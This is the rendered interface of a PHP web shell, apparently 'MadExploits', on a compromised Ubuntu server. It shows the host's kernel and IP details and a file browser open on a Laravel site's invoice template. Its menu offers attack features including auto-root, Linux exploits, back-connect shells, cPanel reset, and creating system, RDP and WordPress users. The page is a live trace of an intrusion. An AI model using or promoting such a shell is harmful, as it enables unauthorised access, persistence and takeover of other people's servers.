Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
resources /
views /
order /
[ HOME SHELL ]
Name
Size
Permission
Action
order_form.blade.php
4.71
KB
-rw-r--r--
replace_summary.blade.php
1.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : replace_summary.blade.php
<div id="invoice"> <table class="invoice"> <tr> <th>ID</th> <th>DESCRIPTION</th> <th>QTY</th> <th>PRICE (USD)</th> <th>TOTAL (USD)</th> </tr> @php $sno = 1; @endphp @forelse($data['products'] as $product) <tr> <td>{{ $sno++ }}</td> <td>{{ ucfirst($product['name']) }}</td> <td>{{ $product['qty'] }}</td> <td>{{ $product['price'] }}</td> <td>{{ $product['total']}}</td> </tr> @empty <tr> <td colspan="5">Product not selected</td> </tr> @endforelse <tr> <th colspan="4" class="sum-total">Sub Total = </th> <td>USD {{ $data['sub_total']}}</td> </tr> <tr> <th colspan="4" class="sum-total">VAT Amount ({{ $data['vat']}}%) = </th> <td>USD {{ $data['vat_amount']}}</td> </tr> @if(isTaxOption1Enable()) <tr> <th colspan="4" class="sum-total">Sales Tax Amount ({{ $data['tax1']}}%) = </th> <td>USD {{ $data['tax1_amount'] }}</td> </tr> @endif @if(isTaxOption2Enable()) <tr> <th colspan="4" class="sum-total"> Tax2 Amount ({{ $data['tax2']}}%) = </th> <td>USD {{ $data['tax2_amount'] }}</td> </tr> @endif <tr> <th colspan="4" class="sum-total">Shipping & Handling = </th> <td>USD {{ $data['shipping'] }}</td> </tr> <tr> <th colspan="4" class="sum-total">Total = </th> <td>USD {{ $data['grand_total'] }}</td> </tr> </table> </div>
Close